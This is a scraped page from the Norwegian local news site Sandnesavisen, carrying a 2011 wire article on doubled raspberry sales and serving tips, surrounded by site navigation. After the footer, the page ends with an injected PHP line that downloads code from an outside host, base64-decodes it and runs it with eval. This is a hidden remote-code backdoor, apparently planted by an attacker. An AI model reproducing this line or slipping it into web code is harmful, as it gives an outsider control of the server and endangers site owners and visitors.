Tryggbarna1
GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
30. mai 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vær - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bøker
Musikk
Film
Byen vår
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrått
Figgjo
Ganddal
Hana
Høle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Håndball
Kultur
Politikk
Økonomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersåk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Båt
Tog
Bringebærsalget rett til værs
Skrevet av Newswire   
onsdag 27. juli 2011

(NW) Salget av ferske bringebær er mer enn doblet på fem år. Nå er den norske bringebærsesongen her for fullt, men vær rask, for om en måned er den over.

Bringebærsalget rett til værs
- Norske bringebær smaker sommer, mener Britt Kåsin i Opplysningskontoret for frukt og grønt (Foto: Dag Øyvind Olsen/Newswire).

– Bringebær er jordbærets herlige lillesøster her i landet. Det er et anvendelig gourmet-bær som kan brukes til utrolig mye forskjellig. Salgskurvene for bringebær i butikk peker rett oppover, sier informasjonssjef Britt Kåsin i Opplysningskontoret for frukt og grønt (OFG).

I fjor ble det solgt 922 tonn bringebær i Norge, mot 411 tonn i 2006.

– Vi spiser mest norske bær, men også importen øker. Vi kan nå få ferske bringebær i butikkene hele året. Den norske sesongen varer fra midten av juli til siste halvdel av august. Det er i den perioden vi spiser desidert mest bringebær, sier Britt Kåsin.

Bringebær til middag
Folk flest spiser gjerne bringebær sammen med fløte, krem, is eller vaniljesaus. Bærene egner seg ypperlig i kaker. Helsebevisste bruker ofte bringebær på toppen av kornblandinger til frokost. Britt Kåsin oppfordrer oss til å forsøke bringebær også på nye måter.

– Den søtsyrlige smaken fra bærene er en virkelig god match til salt spekemat, og det ser sommerlig lekkert ut. Bærene hever også smaken i vanlige grønne salater til middag.

Moste bringebær til grillmat og i marinader er andre smaklige varianter.

Bringebær skal oppbevares kaldt, men det er viktig å temperere dem før servering. Først da får man fram smak og aroma for fullt.

– Ta bærene ut av kjøleskapet minst to timer før servering, oppfordrer Britt Kåsin.

Skaper fest
Bringebær gjør seg også godt i fruktsalater, og i glasset, enten man drikker smoothies eller boblende drikke.

– Bærene ser flotte ut i glass boblende sommerdrikke som kullsyret vann eller musserende vin. De skaper fest. Dessuten er det veldig godt.

Flere oppskrifter og inspirasjon til hva du kan bruke bringebærene til, finner du på www.frukt.no

Ifølge tall fra Opplysningskontoret for frukt og grønt var det bringebær sammen med jordbær, blåbær og mango som hadde størst salgsøkning målt i verdi i 2010. Av de 922 tonnene med bringebær som ble solgt i fjor, var 599 tonn norskprodusert.

– Både vi og produsentene venter en fortsatt raskt stigende salgskurve for bringebær i årene som kommer. Bær generelt blir stadig mer viktig i vårt kosthold, sier informasjonssjef Britt Kåsin i OFG.

Bringebær bør vi spise mye av nå i sesongen, mener hun.

– De er fulle av antioksidanter, er rike på c-vitaminer, magnesium og kalium. Og så smaker de sommer-herlig!

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Papirutgaver
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));